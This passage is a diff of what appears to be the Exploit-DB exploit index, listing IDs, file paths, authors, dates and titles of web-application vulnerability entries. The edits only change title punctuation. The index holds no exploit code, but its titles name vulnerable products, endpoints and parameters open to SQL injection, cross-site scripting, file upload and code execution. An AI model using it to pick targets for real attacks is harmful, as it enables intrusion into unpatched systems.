Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -35910,10 +35912,10 @@ id,file,description,date,author,platform,type,port 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 37086,platforms/php/webapps/37086.txt,"WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 -37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 +37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37090,platforms/php/webapps/37090.txt,"Joomla! Component JA T3 Framework - Directory Traversal",2012-04-17,indoushka,php,webapps,0 37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 -37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php to_userid' Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 @@ -36171,7 +36173,7 @@ id,file,description,date,author,platform,type,port 37472,platforms/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 40676,platforms/php/webapps/40676.txt,"My Little Forum 2.3.7 - Multiple Vulnerabilities",2016-11-01,"Ashiyane Digital Security Team",php,webapps,0 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 -37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 +37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 37476,platforms/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injections",2012-07-04,snup,php,webapps,0 37481,platforms/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 @@ -36236,7 +36238,7 @@ id,file,description,date,author,platform,type,port 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! Component 'com_photo' - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps,0 -37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Function Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 +37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 37578,platforms/php/webapps/37578.txt,"Open Constructor - users/users.php keyword Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37579,platforms/php/webapps/37579.txt,"Open Constructor - data/file/edit.php result Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37580,platforms/php/webapps/37580.txt,"Open Constructor - confirm.php q Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 @@ -36244,7 +36246,7 @@ id,file,description,date,author,platform,type,port 37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 -37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php subject_module_id' Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"Getsimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 @@ -36345,7 +36347,7 @@ id,file,description,date,author,platform,type,port 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37754,platforms/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37948,platforms/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 -37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 +37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0 @@ -36474,7 +36476,7 @@ id,file,description,date,author,platform,type,port 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,hardware,webapps,80 38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0 -38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 +38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 @@ -36527,7 +36529,7 @@ id,file,description,date,author,platform,type,port 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 -38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 +38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext' Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 @@ -36539,14 +36541,14 @@ id,file,description,date,author,platform,type,port 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 38152,platforms/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 -38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 +38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html acct' Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38154,platforms/php/webapps/38154.txt,"cPanel - detailbw.html Multiple Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 38157,platforms/php/webapps/38157.txt,"WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 -38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 38163,platforms/php/webapps/38163.txt,"WordPress Plugin Uploader - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 @@ -36666,18 +36668,18 @@ id,file,description,date,author,platform,type,port 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 -38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 -38425,platforms/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38426,platforms/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 +38425,platforms/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38426,platforms/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38427,platforms/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php site' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38429,platforms/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38430,platforms/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php var' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php email' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php q' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 38439,platforms/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 @@ -36695,8 +36697,8 @@ id,file,description,date,author,platform,type,port 38458,platforms/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38460,platforms/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 -38461,platforms/java/webapps/38461.txt,"Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 -38462,platforms/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38461,platforms/java/webapps/38461.txt,"Hero Framework - '/users/login Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38462,platforms/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password error' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 @@ -36807,7 +36809,7 @@ id,file,description,date,author,platform,type,port 38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 -38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 +38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38688,platforms/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 @@ -36888,7 +36890,7 @@ id,file,description,date,author,platform,type,port 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 -38863,platforms/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 +38863,platforms/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php query' Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 @@ -36900,7 +36902,7 @@ id,file,description,date,author,platform,type,port 38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 -38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 +38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp pa' Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,php,webapps,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 @@ -36944,18 +36946,18 @@ id,file,description,date,author,platform,type,port 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 38943,platforms/php/webapps/38943.txt,"Joomla! Component 'com_aclsfgpl' - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 -38944,platforms/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38945,platforms/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38946,platforms/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38947,platforms/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38948,platforms/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38949,platforms/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38950,platforms/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38951,platforms/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38952,platforms/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38953,platforms/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38954,platforms/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38955,platforms/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38944,platforms/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38945,platforms/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38946,platforms/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38947,platforms/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38948,platforms/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38949,platforms/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38950,platforms/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38951,platforms/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38952,platforms/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38953,platforms/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38954,platforms/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38955,platforms/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38956,platforms/php/webapps/38956.txt,"Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38957,platforms/php/webapps/38957.html,"Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38958,platforms/php/webapps/38958.html,"Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -36970,22 +36972,22 @@ id,file,description,date,author,platform,type,port 38977,platforms/php/webapps/38977.py,"Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple 